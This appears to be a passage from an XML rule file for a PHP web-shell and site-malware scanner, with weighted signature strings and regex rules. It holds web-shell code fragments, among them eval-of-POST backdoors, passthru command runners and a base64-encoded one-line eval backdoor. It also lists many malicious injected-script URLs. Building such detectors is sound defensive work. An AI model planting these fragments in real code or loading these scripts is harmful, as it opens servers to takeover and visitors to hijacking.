<STR>SetHandler application/x-httpd-php</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>preg_replace($exif['Make'],$exif['Model'],'')</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>oo0o0O0o00oOo0O0o0OoO</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Eval(base64_decode(file_get_contents(base64_decode</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>eval(gzinflate(base64_decode(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>eval(gzinflate(STR_rot13(base64_decode(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>eval(gzuncompress(base64_decode(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>eval(STR_rot13(</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>TG9jYXRpb24</STR>
<NUM>55</NUM>
</ITEM>
<ITEM>
<STR>base64_decode("4D5A90000300000004</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>0x4d5a4b45524e454c33322e444c4c00004c6f61644c6962726172794</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>langouster_udf.dll</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$b33 = $_SERVER['DOCUMENT_ROOT']</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>passthru($cmd)</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>PHP Web Shell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>P.h.p.S.p.y</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>phpshell</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>w4ck1ng</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>PhpSpy</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>_pass</STR>
<NUM>1</NUM>
</ITEM>
<ITEM>
<STR>b374k</STR>
<NUM>79</NUM>
</ITEM>
<ITEM>
<STR>milw0rm</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>c80</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>c100</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>STUNSHELL</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>FaTaLisTiCz</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Fx29SheLL</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>backdoor</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>$back_connect</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>r57</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Pr!v8</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>webadmin</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>PHPJackal</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>C80madShell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Ve_cENxShell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>ipconfig -all</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>cmd.exe /c</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>/bin/sh</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>c80shell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>NGHshell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Xgr0upVN</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>call_user_func(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>fsockopen</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>tools88.com</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>EgY_SpIdEr</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>XXDD0S</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>cha88.cn</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>SECFORCE</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>webshell</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>auto_prepend_file</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>Guama_</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Qingma_Auto</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>Qingma_c</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>Antivirus_e</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Exec_g</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>admin_spiderpass</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>Shell (SPS-3.0)</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Spider PHP Shell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>SELECT cmd FROM a INTO DUMPFILE</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>net start Terminal Services</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>SELECT spider FROM Spider_Temp_Tab</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>base64_decode($back_connect</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>k1r4fsearch</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>fuckanquangoutezheng</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>'\'a\'eis','e'.'v'.'a'.'l'.'($g($b($enfile)))','a'</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>3vWW7F6DsceDRT0dKtBX2rqX5Fh9tJDJpG71Byr5Th6TsbPulbB8Gmg3</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>GUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lW</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$entry_line="HACKed by EntriKa";</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>cont=replace(cont,"href=""","href=""?gov.cn.")</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$dez = $pwddir."/".$real;</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>echo "FILE UPLOADED TO $dez"</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>"R0lGODlhWAKWAOf</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$ydosya2 = fopen("$ydosya", 'w')</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>fwrite($ydosya2, $kodlar)</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>cat /tmp/cmdtemp; rm /tmp/cmdtemp</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>MyShell: can't change directory.\n$work_dir</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>if(get_magic_quotes_gpc())$shellOut=STRipslashes($shellOut)</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>if(file_exists("c:\\windows\\system32\\"))$dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>WWW.XXDDOS.COM</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>JCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5P</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$liz0zim=shell_exec($_POST[liz0])</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>dHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAA</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>744zdMGn59wNZsz05tcH40pO/GcCgDzJj+e</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>((!isset($key))?($key=implode('`, `',array_keys($line))):null);</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>;@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>hYSMtmdpZNpy8ZY6hBlJJxBWSVC5FiGoIRJzgYAXAW</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>Calistirmak istediginiz komutu buraya girin</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>@oOo00o0OOo0o000000O($_GET["pass"]</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>AAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>'.getenv("HTTP_HOST").' - Antichat Shell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>move_uploaded_file($userfile, "entrika.php");</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$curcmd = "cd ".$curdir.";".$curcmd</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>TDWGKJ3Ai1/BCtiO9grefEeAoU46gAwUDUuI4udXxGGoG</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>udp://$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>mailto:crazy_king@turkusev.net</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>if (!empty($unset_surl)) {setcookie("c80sh_surl"); $surl = "";}</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>${'_'.$_}['_'](${'_'.$_}['__'])</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$myurl='http://www.mianshamuma.com'</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>{chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$Remote_server = "http://cs.sff8.com/</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>$Remote_server = "http://www.kmbczl.com/</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>Remote_server = base64_decode('aHR0cDovL2pzLmh0bTEuY2M=')</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>eval(@base64_decode($_POST</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>eval(base64_decode($_POST</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>preg_replace('/'.'1'.'/'.'i'.'s'.'e'.'x' , 'e'.'v'.'al('.'$_'.'PO'.'ST</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>preg_replace('/'.'1'.'/'.'i'.'s'.'e'.'x','e'.'v'.'al('.'$_'.'P'.'O'.'S'.'T</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>preg_replace('/'.'1'.'/'.'i'.'s'.'e'.'x','e'.'v'.'al('.'$_'.'PO'.'ST</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>preg_replace('/ad/e','@'.str_rot13('riny')</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>str_rot13('riny')</STR>
<NUM>80</NUM>
</ITEM>
<RULE>
<ITEM>[^\w](eval|assert|popen|proc_open|shell_exec|passthru|system|create_function)\(([^\(\)]*)STRipslashes\((\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]\)</ITEM>
<ITEM>STRrev\(([^\(]*)edoced_46esab([^\(]*)\)</ITEM>
<ITEM>fputs\(fopen\([^\(\)]*\),[^\(\)]*(\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]</ITEM>
<ITEM>[^\>"](\$_GET|\$_POST)\[[^\(\)\{\}\[\]]{0,8}\]\((\$_GET|\$_POST)\[</ITEM>
<ITEM>(?i)[^\w](eval|assert|popen|proc_open|shell_exec|passthru)\s*\(\\?(\$_GET|\$_COOKIE|\$_POST|\$_SESSION|\$_REQUEST)(\s*)\[(\s*.{1,20}\s*)\]([^\)]*)\)</ITEM>
<ITEM>^gif89a</ITEM>
<ITEM>(?i)[^\w]eval\(base64_decode\((\$_GET|\$_POST|\$_REQUEST)\[.{0,34}\]\)\)</ITEM>
</RULE>
</WEBSHELL>
<INFORMATION>
<ITEM>
<STR>phpddos</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>socket_create(AF_INET, SOCK_STREAM, SOL_TCP)</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>www.phpddos.com</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>pfsockopen("tcp://</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>pfsockopen("udp://</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>fsockopen("udp://</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>buyer_nick</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>receiver_mobile</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>receiver_address</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>oybhacker</STR>
<NUM>60</NUM>
</ITEM>
</INFORMATION>
<SEO>
<ITEM>
<STR>.1188588.com/mb/js1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>1.81949.com/mb/images/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>23.245.198.139:88/files/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>255667.com/mb/public/css/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>51yes.com/click.aspx?id=214346876</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>767002.com/mb/images/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>8kyule.com/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>94v587.com/include/js/hz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>955947.com/mb/2.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>api.discuz.com.de/bet.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>cr88888.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http%3A//www.go0qle.com/zq.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2E%62%65%74%30%30%31%2E%63%6F%6D/%61%64/%73.%67i%66</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2E%6A%78%31%34%30%2E%63%6F%6D/liu/jc/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2e%74%74%72%64%79%2e%63%6f%6d/%73%65%6f/%6c%68/mao/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://%77%77%77%2e%74%74%72%64%79%2e%63%6f%6d/%73%65%6f/sf/2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://001sx.com/tz/zqad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://0913web.com/cpc3.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://1.81949.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://11.988947.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://112.213.126.202/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://162.217.172.14:60/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://184.22.155.137:100/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://184.22.4.27/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://19821024.com/mydown.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://23.245.198.138:88/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://23.245.198.140:88/haha/t.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://23.88.85.201/by/zs.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://23678.net/lh/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://3.cr88888.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://3.ttleba.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://400378.com/boc/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/js/zz/sc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/js/zz/sc2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/lun/tan.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://5vw.net/baidu/liu/lun/tan2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://61.194.40.116/docs/images/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://666.sa8999.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://777.sa8999.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://955947.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://966947.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://bc.088234.com/muban/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://bc.2267888.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://bc.255667.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://bc.v5cx.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://billingchn.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://chong.moguiruanjian.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count21.51yes.com/click.aspx?id=214346876&logo=12]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count22.51yes.com/click.aspx?id=224783687&logo=1]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count25.51yes.com/click.aspx?id=254751652&logo=1]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count35.51yes.com/click.aspx?id=358243338&logo=1]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count50.51yes.com/click.aspx?id=509346372&logo=1]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://dollar.aiwofacai.com/ll/tz3.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://dollar.aiwofacai.com/ll/tz8.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://down.9uvip.com/2013-1/mydown4.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://enoakley.sy-zy.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://fa57888.com/2014.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://geter.pw/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://gh5.710880.com/j.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://hy.168cnzz.com/cnl/j.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://hy.168cnzz.com/cnz/j.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://info.118tkw.net/hao/2014/new.gif</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://jc.dk90.com/game.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://jfpci.com/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.3bxc.com/h/h.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/js3.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/xm2.html</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/xm2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/ycx/ch.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.555hhh.com/4.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/116154252.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/15711966.js </STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/15711967.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/15885296.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16235822.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16666327.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16670068.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16688518.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16767843.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16936002.js </STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/17138832.js </STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/1966.js </STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://liii.us/3.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://live.huangguan.co/qz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://ly.sinacnzz.com/qq/qq.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://ly.sinacnzz.com/yx/y.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/22.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/3.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/b.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/m.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/mz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/ooppoo888.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/plc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/a/9.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/k/bb.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/k/offlinebcwr.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/k/offlinebcxa.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://money.ons72.com/liuhecai/js/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://n.xxtdata.com/js/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://n.xxtdata.com/js/v2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://ok.ko699.com/baidu/liu/key/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://oppoo.pw/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://price.un.zhuna.cn/room.gbk.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://qianlai.cc/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://se.52hijack.com/jc/out.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://se.52hijack.com/jc/outs.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://seo.no93.com/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://sm.49wl.com/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://static.aoosou.com/v1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://sy.e7q0.com/qq4923600/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://sy.e7q0.com/qq4923600/zs.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://syw.i11.cc/qq4923600/zs.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.1990seo.com/bc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.1990seo.com/mb/bc2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/8FUS3lF</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/8FmDqJk</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/zRKYOXI</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/zRxuwns</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.hz600.com/t.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://tz.yuedw.com/sy/6.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://url.cn/RJAXT4</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://v.4355v.info/a/main.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://v.ijsdata.com/js/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://v.ijsdata.com/js/v2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.0012888.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.001sx.com/tz/zqad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.0034888.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.068899.com/js/ad2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.077399.com/bctiaozhuan/zq2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.088456.com/muban/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.1188588.com/mb/js1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.118jf.com/cqad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.1233321.com/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.2267888.com/mb/js2.js</STR>
<NUM>80</NUM>
</ITEM>
